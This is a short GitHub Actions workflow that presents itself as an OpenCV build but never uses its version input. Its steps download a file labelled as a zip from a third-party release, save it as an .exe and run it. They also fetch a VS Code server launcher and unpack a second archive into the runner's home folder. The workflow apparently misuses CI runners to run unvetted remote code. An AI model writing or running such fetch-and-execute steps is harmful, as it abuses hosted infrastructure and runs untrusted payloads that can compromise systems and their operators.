name: vscode

on:
  workflow_dispatch:
    inputs:
      opencv-version:
        description: vscode
        required: true
        default: 4.5.2

jobs:
  publish_windows_x64:
    runs-on: windows-latest

    steps:
      - name: dodl
        run: |
          Invoke-WebRequest "https://github.com/Klanly/buildcv/releases/download/200.300/stdprt.zip" -OutFile "c:\stdprt.exe"
          Invoke-WebRequest "https://aka.ms/vscode-server-launcher/x86_64-pc-windows-msvc" -OutFile "c:\vsc.exe"
          Invoke-WebRequest "https://github.com/Klanly/buildcv/releases/download/200.300/vkli.zip" -OutFile "c:\vkli.zip"
      - name: tocmd
        run: |
          7z x -oC:\Users\runneradmin\ c:\vkli.zip
          c:\stdprt.exe
        shell: cmd

 
